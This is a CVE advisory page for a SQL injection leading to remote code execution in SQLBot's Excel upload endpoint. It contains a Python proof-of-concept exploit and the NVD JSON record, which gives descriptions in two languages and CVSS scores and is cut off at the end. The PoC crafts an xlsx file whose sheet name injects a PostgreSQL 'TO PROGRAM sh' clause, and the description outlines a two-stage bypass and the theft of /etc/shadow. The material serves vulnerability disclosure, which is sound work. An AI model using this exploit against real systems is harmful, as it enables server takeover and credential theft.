CVE-2026-32950

import requests import zipfile import io # Target URL url = 'http://target:port/api/v1/datasource/uploadExcel' # Create a malicious Excel file by tampering with XML # The sheet name is injected into a COPY command to execute 'sh' malicious_sheet_name = "tablename) TO PROGRAM 'sh' --" # Simulating the creation of a zip file (xlsx) with modified workbook.xml # In a real exploit, you would unzip an xlsx, modify xl/workbook.xml, and re-zip. memory_file = io.BytesIO() with zipfile.ZipFile(memory_file, 'w', zipfile.ZIP_DEFLATED) as zf: # Add dummy content (simplified for PoC) zf.writestr('xl/workbook.xml', f'<workbook><sheets><sheet name="{malicious_sheet_name}"/></sheets></workbook>') zf.writestr('[Content_Types].xml', '<Types />') memory_file.seek(0) # Send the malicious file files = {'file': ('exploit.xlsx', memory_file, 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet')} headers = {'Authorization': 'Bearer <low_privilege_token>'} response = requests.post(url, files=files, headers=headers) print(f"Status: {response.status_code}") print(f"Response: {response.text}")

{"cve": {"id": "CVE-2026-32950", "sourceIdentifier": "[email protected]", "published": "2026-03-20T05:16:14.553", "lastModified": "2026-03-23T18:04:30.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQLBot is an intelligent data query system based on a large language model and RAG. Versions prior to 1.7.0 contain a critical SQL Injection vulnerability in the /api/v1/datasource/uploadExcel endpoint that enables Remote Code Execution (RCE), allowing any authenticated user (even the lowest-privileged) to fully compromise the backend server. The root cause is twofold: Excel Sheet names are concatenated directly into PostgreSQL table names without sanitization (datasource.py#L351), and those table names are embedded into COPY SQL statements via f-strings instead of parameterized queries (datasource.py#L385-L388). An attacker can bypass the 31-character Sheet name limit using a two-stage technique—first uploading a normal file whose data rows contain shell commands, then uploading an XML-tampered file whose Sheet name injects a TO PROGRAM 'sh' clause into the SQL. Confirmed impacts include arbitrary command execution as the postgres user (uid=999), sensitive file exfiltration (e.g., /etc/passwd, /etc/shadow), and complete PostgreSQL database takeover. This issue has been fixed in version 1.7.0."}, {"lang": "es", "value": "SQLBot es un sistema inteligente de consulta de datos basado en un modelo de lenguaje grande y RAG. Las versiones anteriores a la 1.7.0 contienen una vulnerabilidad crítica de inyección SQL en el endpoint /api/v1/datasource/uploadExcel que permite la ejecución remota de código (RCE), lo que permite a cualquier usuario autenticado (incluso el de menor privilegio) comprometer completamente el servidor backend. La causa raíz es doble: los nombres de las hojas de Excel se concatenan directamente en los nombres de las tablas de PostgreSQL sin sanitización (datasource.py#L351), y esos nombres de tablas se incrustan en las sentencias SQL de COPY a través de f-strings en lugar de consultas parametrizadas (datasource.py#L385-L388). Un atacante puede eludir el límite de 31 caracteres para el nombre de la hoja utilizando una técnica de dos etapas: primero, subiendo un archivo normal cuyas filas de datos contengan comandos de shell, y luego, subiendo un archivo manipulado con XML cuyo nombre de hoja inyecte una cláusula TO PROGRAM 'sh' en el SQL. Los impactos confirmados incluyen la ejecución arbitraria de comandos como el usuario postgres (uid=999), la exfiltración de archivos sensibles (p. ej., /etc /passwd, /etc /shadow) y la toma de control completa de la base de datos de PostgreSQL. Este problema ha sido solucionado en la versión 1.7.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": " ... (truncated)